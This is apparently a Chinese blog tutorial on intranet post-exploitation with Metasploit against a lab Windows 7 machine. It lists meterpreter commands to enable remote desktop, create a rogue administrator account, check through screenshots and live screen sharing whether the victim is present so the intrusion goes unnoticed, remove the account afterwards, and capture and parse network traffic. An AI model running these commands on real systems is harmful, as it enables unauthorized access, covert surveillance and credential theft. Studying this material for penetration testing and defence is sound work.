当前位置:网站首页>内网渗透之内网信息收集(二)
内网渗透之内网信息收集(二)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
05打开并连接3389
查看3389端口的开放情况
开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e
可以利用该命令在目标机器上添加用户:
run getgui -u admin -p [email protected](一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)
远程连接桌面
rdesktop -u username -p password ip
yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)
登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)
查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)
use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)
删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- Wechat applet
- Experiment 7 use of common classes (correction post)
- Experiment five categories and objects
- Safe driving skills on ice and snow roads
- [data processing of numpy and pytoch]
- 7-14 error ticket (PTA program design)
- HackMyvm靶机系列(3)-visions
- 附加简化版示例数据库到SqlServer数据库实例中
- 《英特尔 oneAPI—打开异构新纪元》
- Xray and Burp linked Mining
猜你喜欢
Low income from doing we media? 90% of people make mistakes in these three points
Applet Web Capture -fiddler
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
HackMyvm靶机系列(6)-videoclub
2. First knowledge of C language (2)
Poker game program - man machine confrontation
记一次,修改密码逻辑漏洞实战
SRC挖掘思路及方法
Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
Hackmyvm target series (7) -tron
随机推荐
Detailed explanation of network foundation routing
Record once, modify password logic vulnerability actual combat
7-9 make house number 3.0 (PTA program design)
Hackmyvm target series (2) -warrior
强化学习基础记录
Force deduction 152 question multiplier maximum subarray
网络层—简单的arp断网
Difference and understanding between detected and non detected anomalies
Hackmyvm target series (5) -warez
A complete collection of papers on text recognition
强化学习基础记录
Experiment 9 input and output stream (excerpt)
HackMyvm靶机系列(3)-visions
Safe driving skills on ice and snow roads
Brief introduction to XHR - basic use of XHR
《英特尔 oneAPI—打开异构新纪元》
中间件漏洞复现—apache
[VMware abnormal problems] problem analysis & Solutions
7-11 mechanic mustadio (PTA program design)
简单理解ES6的Promise